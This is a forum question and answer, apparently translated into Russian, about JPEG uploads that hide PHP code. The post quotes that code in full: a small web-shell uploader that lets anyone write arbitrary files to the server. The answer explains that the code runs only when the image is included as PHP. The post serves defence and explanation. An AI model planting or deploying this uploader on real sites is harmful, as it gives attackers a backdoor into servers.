Пользователь загрузил несколько изображений jpg, которые, кажется, содержат некоторый php-код. Файл начинается с ÿØÿà, за которым следует NUL DLE JFIF NUL SOH SOH SOH NUL NUL
NUL NUL ÿá NUL SYN Exif NUL NUL II * … (много других нулевых символов и т. Д.). Тогда следующий код php:
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
сопровождается большим количеством двоичного кода. Изображение показывает ногу с черным (как положить ногу на сканер или копир).
Эти изображения потенциально опасны? Если да, то как.
Да. Это внедрение кода, которое использует известную ошибку, подробнее: http://php.webtutor.pl/en/2011/05/13/php-code-injection-a-simple-virus-written-in-php-and-carried-in-a-jpeg-image/
Эти изображения выполняют код, только если ваш PHP-скрипт использует require($image)
или же include($image)
отображать ваши изображения, в противном случае, не волнуйтесь. Не забудьте отследить пользователя и, возможно, включить его в черный список 🙂
Других решений пока нет …